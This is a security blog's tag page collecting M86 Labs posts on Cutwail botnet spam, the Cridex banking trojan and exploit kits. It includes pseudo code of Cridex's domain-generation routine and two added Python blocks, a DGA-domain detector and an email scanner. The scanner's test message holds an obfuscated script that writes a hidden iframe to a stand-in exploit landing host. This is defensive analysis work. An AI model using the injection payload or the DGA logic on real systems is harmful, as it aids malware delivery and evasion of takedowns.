Posts Tagged ‘Cutwail’


The Cridex Trojan Targets 137 Financial Organizations in One Go

By Daniel Chechik  •  March 1st, 2012  •   Botnets Cybercrime Malware Spam

A few weeks ago M86 Security Labs alerted that cybercriminals had managed to compromise hundreds of WordPress-based sites. These attacks started with several large spam campaigns, as reported in our most recent blog post on Cutwail. The emails included embedded URL links or HTML attachments that tricked the user into browsing to the compromised Web sites. All these links eventually led to Web pages infected with the Phoenix exploit kit. These cybercriminals operate Fast flux networks, a DNS technique used by botnets to hide the main C&C servers.

After the target machine is successfully exploited, the Phoenix exploit kit downloads a Trojan to the victim’s machine. The downloaded Trojan is recognized by antivirus vendors under several names such as Cridex, Carberp and Dapato. Antivirus detection is quite low and only ten out of 43 antivirus scanners in VirusTotal can detect it.

VirusTotal scan of Cridex

Let’s take a look at how this Trojan operates, step by step.

Once the Cridex Trojan is loaded on the victim’s machine it executes several actions. First, it copies itself to drive C: as KB00447841.exe and creates the following files:

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT
C:\Documents and Settings\Administrator\Application Data\KB00447841.exe

The BAT file upon its execution removes the original malware downloaded by the Phoenix exploit kit.

In the second phase, the malware hooks into the “explorer.exe” process. It then communicates with its C&C over Fast flux networks, which makes it harder to identify and shut down the C&C servers. Every several hours one domain becomes unavailable and is replaced by another one. In some cases, the traffic flow of the Trojan can look like this:

Fiddler dump of the Trojan’s traffic activity

Fiddler dump of the Trojan’s traffic activity

Cridex consistently tries to find a live proxy to reach the C&C server. At first glance the domain names look random. However, when taking a closer look, we see that the Trojan generates a new domain name before every attempt to access the C&C:

Ollydbg - Debugging of "Explorer.exe" infected by the Trojan

Here is pseudo code of the Trojan’s domain-generation routine:

ECX = ECX * 0x19660D          ; linear congruential step: multiplier 0x19660D,
ECX = ECX + 0x3C6EF35F        ; increment 0x3C6EF35F
ECX = ECX << 0x10
ECX = ECX - 0x7FFF
EAX = ECX
EDX = 0                       ; EDX = 0 and EBP = 0x1A set up an unsigned DIV by 26
EAX = EAX XOR 0x88
EBP = 0x1A
EAX = EAX / 0x1A              ; quotient
EDX = EAX % 0x1A              ; remainder, 0..25
ESI++
EDX = EDX + 0x61              ; 0x61 = 'a': the remainder becomes a lowercase letter
Address[EBX + ESI] = DX       ; append the letter to the domain name buffer
If not reached the end of the domain name length continue

Using this algorithm to generate and access domains, the cybercriminals can resume the attack even after their server(s) have been offline for some period of time.
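As an added example (not code from the original post), here is a defender-side check built on two details above: the routine only ever emits lowercase letters (remainder + 0x61), and an infected host cycles through many such domains looking for a live proxy. The proxy log lines, the 0.25 vowel-ratio cutoff and the per-client threshold are constructed assumptions, not values from the post.

```python
import re
from collections import defaultdict

# Constructed proxy log lines (not the post's Fiddler capture): one client
# cycling through lowercase-only domains, one client browsing normally.
LOG_LINES = """\
2012-03-01T10:00:01 10.0.0.5 GET http://qwtkzplmcfgd.com/ 503
2012-03-01T10:00:03 10.0.0.5 GET http://hrbmvxqzldpw.net/ 503
2012-03-01T10:00:05 10.0.0.5 GET http://nfjqcvbkxzrt.org/ 503
2012-03-01T10:00:08 10.0.0.5 GET http://ztlwpqmvkxcd.com/ 200
2012-03-01T10:00:09 10.0.0.7 GET http://www.example.com/index.html 200
2012-03-01T10:00:12 10.0.0.7 GET http://mail.example.org/inbox 200
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)
HOST_RE = re.compile(r"^https?://([^/:]+)")
VOWELS = set("aeiou")


def sld_label(host):
    """Second-level label of a host: 'qwtkzplmcfgd' for 'www.qwtkzplmcfgd.com'."""
    parts = host.lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def label_looks_generated(label, min_len=8):
    """Heuristic: lowercase a-z only (the alphabet the routine above emits),
    long enough, and far poorer in vowels than natural words (assumed cutoff)."""
    if not re.fullmatch(r"[a-z]+", label) or len(label) < min_len:
        return False
    vowel_ratio = sum(c in VOWELS for c in label) / len(label)
    return vowel_ratio < 0.25


def flag_clients(lines, threshold=3):
    """Map client -> sorted generated-looking hosts, for clients that contacted
    at least `threshold` distinct ones (the 'find a live proxy' churn)."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed log format
        h = HOST_RE.match(m["url"])
        if h and label_looks_generated(sld_label(h.group(1))):
            seen[m["client"]].add(h.group(1))
    return {c: sorted(hs) for c, hs in seen.items() if len(hs) >= threshold}


if __name__ == "__main__":
    for client, hosts in flag_clients(LOG_LINES).items():
        print(client, "contacted", len(hosts), "generated-looking domains:", hosts)
```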

Once the Trojan finds a live proxy, it connects to the C&C server and downloads a customized configuration from the Cridex botnet. The cybercriminals are currently running multiple botnets with over 25,000 infected machines.

Cridex botnet control panel

This Trojan’s capabilities are broadly similar to those of Zeus and SpyEye. It collects information from the user’s machine and sends it to the C&C server. This information can include, for example, cookies, FTP credentials and email accounts.

The configuration panel of the Cridex Trojan

The cybercriminals can track specific Web sites accessed by the user, taking screenshots of every such page in real time. They can also blacklist URLs, redirect URLs and more. As with the Zeus Trojan, the administrators can supply code to be injected into Web pages. The Cridex Trojan intercepts browser requests and changes the displayed content according to the configuration written by the administrator of the botnet. This way the cybercriminal can trick the user into entering the valuable information the cybercriminal is looking for, without raising suspicion.

What’s new in the Cridex Trojan compared to Zeus or SpyEye?

Cridex has a “WORLD BANKER CENTER” plug-in which includes a database of 137 banks. Yes, one hundred and thirty-seven different banks or financial organizations from all over the world!

Data collected by the "WORLD BANK CENTER" plug-in

This control panel provides a simple user experience for the cybercriminals. It contains the structure of each banking organization’s Web site pages, so the Trojan can identify which valuable fields to send back to the C&C. Moreover, the cybercriminals can create and change the forms that are normally completed by the victim.

Templates of "WORLD BANK CENTER" plug-in

In conclusion, the Cridex Trojan takes control of the victim’s machine and allows the cybercriminals to collect information and potentially make fraudulent transactions by manipulating the bank Web pages.

M86 MailMarshal Secure Email Gateway customers are protected against these blended threat spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix exploit kit and in particular against the Cridex Trojan.


Cutwail Drives Spike in Malicious HTML Attachment Spam

By Rodel Mendrez  •  February 16th, 2012  •   Spam

Over the past month, we have observed several large spam campaigns with malicious HTML attachments. We believe the botnet behind these campaigns is Cutwail. Here is data we collected, starting from the first day of 2012, illustrating spikes of spam with malicious HTML attachments:

Attaching an HTML file to an email is a tactic we have seen used in phishing. But recently, attackers have spammed out large volumes of HTML attachments that include malicious JavaScript. Here is an example we received a few days ago:

In the image above, we opened the message with the attached .HTM file using the Mozilla Thunderbird email client. Although Thunderbird rendered the HTML attachment, fortunately its default settings prevented the malicious JavaScript in the HTML source code from running. The Thunderbird user needs to click the attachment or open the HTML file in a browser for the JavaScript to run.

The image below is another example, from a more recent spam campaign. This particular message claims to be an invoice from a random company, with an attached .HTM file pretending to be the invoice. Here, the sample spam was opened using Microsoft Outlook, and the attachment just shows the icon of the system’s default browser. Again, in order for the malicious JavaScript to execute, the user needs to click the attachment to fire up a browser.


So what happens if the unsuspecting user opens the HTML attachment? Here is the HTML source code:

The first half of the HTML code is the benign part. It provides the “You are redirecting…” text in the browser title bar and prints “Please wait… Loading….” in the browser – the cybercriminal perhaps just being courteous. The second, malicious part is the script tag where the obfuscated JavaScript resides. The JavaScript writes an iframe that loads a webpage in the same browser window. But this is not an ordinary webpage; it contains code that attempts to exploit multiple vulnerabilities in the browser and its plugins. On our test machine, the landing page successfully exploited our browser’s default PDF reader via the LibTIFF integer overflow vulnerability in Adobe Reader. The exploit ended up downloading and installing malware on our test computer, which at the time of writing was a data-stealing Trojan with the antivirus detection name Cridex.
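As an added example (not code from the original post), a mail-gateway style check for the attachment pattern just described: an HTML attachment whose script tag writes an iframe through an unescape()'d string. The sample messages, the example.invalid addresses and hostnames are constructed; the benign control carries the same attachment without the script.

```python
import email
import re
from email import policy

# Constructed sample message (not a real spam sample): an "invoice" mail with an
# .htm attachment whose script writes a hidden iframe, as described above.
SAMPLE_EML = """\
From: billing@example.invalid
To: user@example.invalid
Subject: Invoice 4711
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please find your invoice attached.
--b1
Content-Type: text/html; name="invoice.htm"
Content-Disposition: attachment; filename="invoice.htm"

<html><head><title>You are redirecting...</title></head><body>Please wait... Loading....
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Flanding.example.invalid%2Fin.php%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E'));</script>
</body></html>
--b1--
"""

# Constructed benign control: the same attachment with no script at all.
BENIGN_EML = SAMPLE_EML.split("<script>")[0] + "</body></html>\n--b1--\n"

# Indicators of the pattern in the post: a script tag that writes an iframe,
# usually via obfuscated strings passed through unescape().
INDICATORS = {
    "script_tag": re.compile(r"<script\b", re.I),
    "document_write": re.compile(r"document\.write\s*\(", re.I),
    "unescape": re.compile(r"\bunescape\s*\(", re.I),
    "iframe": re.compile(r"<iframe\b|%3Ciframe", re.I),
}


def html_attachments(raw):
    """Yield (filename, decoded HTML) for each HTML attachment of a raw message."""
    msg = email.message_from_string(raw, policy=policy.default)
    for part in msg.walk():
        name = (part.get_filename() or "").lower()
        is_html = part.get_content_type() == "text/html"
        if is_html and (part.is_attachment() or name.endswith((".htm", ".html"))):
            yield name, part.get_content()


def scan_message(raw):
    """One finding per HTML attachment. 'suspicious' requires a script that
    writes or embeds an iframe, not merely the presence of any script."""
    findings = []
    for name, body in html_attachments(raw):
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(body))
        suspicious = "script_tag" in hits and ("iframe" in hits or "document_write" in hits)
        findings.append({"filename": name, "indicators": hits, "suspicious": suspicious})
    return findings


if __name__ == "__main__":
    for finding in scan_message(SAMPLE_EML) + scan_message(BENIGN_EML):
        print(finding)
```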

The landing page containing the exploit code is produced by an exploit kit, the Phoenix Exploit Kit, which the cybercriminals used for this particular spam campaign. This exploit kit is readily available for cybercriminals to buy and use; all they need is their own webserver that can run PHP server scripts. The image shown below is a screenshot of the actual server’s “Phoenix Exploit’s Kit” admin page. The “—” referrer in the statistics suggests that most visitors were NOT coming from another website but from the HTML files that the cybercriminals spammed out. It also shows over 4000 visitors, 15% of whom were successfully exploited.


Spammers tend to recycle spam campaign themes, sometimes adding different twists. So we expect more of these types of HTML attachment campaigns to come in the future.

M86 MailMarshal customers are protected against these spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix Exploit kit.

Thanks to Daniel Chechik for the additional analysis and insight on the Phoenix kit.


Want to be friends on Facebook? Don’t click the link!

By Phil Hay  •  August 29th, 2011  •   Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. The message looks convincing; it appears the spammers have copied the actual Facebook template and substituted their own links. However, there are clues that it is fake. The message doesn’t contain any profile photos, and they have omitted the recipient’s email address in the fine print at the bottom.


By contrast, here is a legitimate Facebook friend request.


Clicking the link fetches a web page that contains two ways you can infect yourself. First, there is a link pretending to be an Adobe Flash update, through which you can download and install malware manually. Second, there is a hidden iframe that loads data from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilities on your system, notably in Java.


The malware that is downloaded appears to be a data stealer Zbot variant (Virus Total report here).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.


Massive Rise in Malicious Spam

By Rodel Mendrez  •  August 16th, 2011  •   Spam

In April this year, we reported on a spike in malicious spam. Yes, that was a significant increase but not as massive as we have observed this week. From the beginning of August, we have observed a huge surge of malicious spam which far exceeds anything we have seen over the past two years, including prior to the SpamIt takedown last October. The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors.


Last week malicious spam made up at least 13% of the total spam volume we received which is unusual. Yesterday that number spiked to 24%.

Spam by category as of last week

Four of the campaigns, which we identified as originating from the Cutwail botnet, are mostly recycled spam themes – Fedex, credit card, changelogs and invoices. The malware is attached within a compressed ZIP archive and is a Trojan that downloads additional malware, including Fake AV, SpyEye and the Cutwail spambot itself.

Fedex

Fedex Spam Campaign

Credit Card Blocked

Credit Card Blocked spam campaign

Invoice

Invoice spam campaign

Change Log

Change Log spam campaign


Meanwhile, Asprox is continuing to send out malicious hotel transaction spam. The attached malware in this spam campaign installs a password stealer and Fake AV.

Sample of malicious spam sent by Asprox


The Festi botnet has also joined the fray and is sending a malicious “UPS” campaign that distributes the Chepvil Trojan, a downloader that is also installing Fake AV.

UPS spam campaign sent by Festi

This is an epic amount of malicious spam. After multiple recent botnet takedowns, cyber criminal groups remain resilient, clearly looking to build their botnets and distribute more fake AV in the process. It seems spammers have returned from a holiday break and are enthusiastically back to work.


Malicious Spam on the increase again

By Rodel Mendrez  •  April 29th, 2011  •   Spam

Malware distribution via email is far from dead.  While we had a distinctly quiet period from October 2010 to March 2011, our stats show the bot herders are gearing up again with the proportion of spam with malware attachments rising, although still not as high as the peaks we saw mid last year when the Bredolab and Cutwail botnets were in full swing.

Malicious spam on the increase again


Malicious Spam Campaign Preys on Japanese Disaster

By Phil Hay  •  March 17th, 2011  •   Spam

There is a large-scale malicious spam campaign going on currently. The spam comes in a few different types, one of which imitates a Twitter notification. The subjects of the spam vary, but sadly, many focus on the recent events in Japan.


The links, which you can see in the image above, or if you look at the raw HTML, are distinctive:

http://lowercase_gibberish.(com|org|net)/base64string

The links lead to a page hosting obfuscated malicious JavaScript, which seeks to exploit a Java vulnerability. Our host was immediately compromised, botted (added to a botnet), and some not-so-subtle fake anti-virus malware was installed, complete with a scary desktop warning:

The spam is originating from one of the Cutwail spambot variants. We managed to get this template from Cutwail command and control traffic, which clearly shows the Twitter template being used.

We are still investigating the nature of the malicious landing page and subsequent infection.

With the rise in social networking, we have been seeing increased use of fake ‘notifications’ being used by spammers.  As ever, remain on guard, especially when it comes to Twitter ‘notifications’.


UPS Spam.. Oh Wait, It’s an FDIC Spam Campaign

By Rodel Mendrez  •  February 15th, 2011  •   Spam

After more than a week of malicious UPS spam campaigns, the Cutwail botnet changed its spamming theme this week. The malicious spam pretends to be from the Federal Deposit Insurance Corporation or FDIC claiming to notify users of important changes in FDIC regulations, hence a “document” is attached for further reading. However, the spammer did not manage to configure the spam template correctly and left the from field still using the domain ups.com.

And even worse, yesterday it left the Subject line as “United Parcel Service notification #<6 digits>”. Fail!

FDIC spam campaign with Subject line and From field pertaining to UPS.

The ZIP attachment contains malware which aims to steal online banking credentials, the same payload as the last week’s UPS spam campaign.

Decompressing the ZIP file exposes an executable Trojan file bearing an Adobe PDF icon

This spam campaign contains enough weird errors for users to notice that the email is indeed suspicious. That may not last, however; we expect this spammer will fix it or come up with new (and recycled) spam campaigns as they try to distribute their malware.


Cutwail’s Spam Cocktail

By Rodel Mendrez  •  September 21st, 2010  •   Spam

Since June of this year when we first saw a FIFA World Cup 2010 spam campaign, we have regularly observed spam campaigns where an HTML attachment contains obfuscated JavaScript redirect code.

The Pushdo botnet’s spamming component, Cutwail, has been the culprit behind these types of malicious campaigns. Many different themes and subject lines have been used, such as the following:

America’s Got Talent
Apartment for rent
Shipping Notifications
Labels and such
Invoice for Floor Replacement
Delivery Status Notification (Failure)
Welcome Letter
NFL Picks Week 2

and other random subjects including this one that uses celebrity names:

Figure 1. Cutwail spam campaign sample

The attached HTML source code is an obfuscated JavaScript, and the snippet of code below is just one of the many variations:

Figure 2. Obfuscated JavaScript code


Pushdo Botnet Crippled – II

By Phil Hay  •  September 9th, 2010  •   Botnets

Two weeks ago we reported on the sudden drop in spam from the Pushdo botnet as a result of many of its control servers being taken down.  Since then, spam output from this botnet has remained subdued, as the following updated chart shows.

As Pushdo (otherwise known by its spamming component Cutwail) was only responsible for about 10% of spam prior to the takedown, overall spam volumes have not been hugely affected.  It is not uncommon to see 10% volume swings in a day.  Having said that, last week our spam volume index did show slightly reduced overall levels of spam for the week.

Things seem to be warming up, however.  Other researchers have observed more Cutwail control servers being added. Also,  yesterday we saw a resumption of malicious spam from Pushdo with the Sasfis downloader as the payload.  This simply reaffirms our earlier suspicions that these guys will not be down for long.


Pushdo Botnet Crippled

By Phil Hay  •  August 27th, 2010  •   Botnets

This morning we noticed that the usual torrent of spam from the Pushdo (or Cutwail) botnet had turned into a dribble.  The chart below shows an index of Pushdo spam volume over the month of August.

Pushdo Stats

So what’s the reason for this sudden decline? It turns out that the folks at TLLOD have been busy analyzing Pushdo command and control servers and coordinating their takedown. According to their blog, over 30 Pushdo control servers were identified and 20 were taken down with the help of the relevant hosting providers. However, a few active control servers still remain, serving up spamming data.

As the chart above shows, this coordinated takedown has had an immediate impact on Pushdo’s spam output. This is welcome news indeed, especially as Pushdo has been responsible for wave after wave of malicious spam campaigns in recent months. Still, we must sound a note of caution. Previous experience has taught us that these botnet takedowns are short-lived. Disabling control servers does not incapacitate the people behind the botnet. It is highly likely they’ll be back before long with new control servers, and bots to do their spamming. In the meantime, we can enjoy a few days with less spam about.
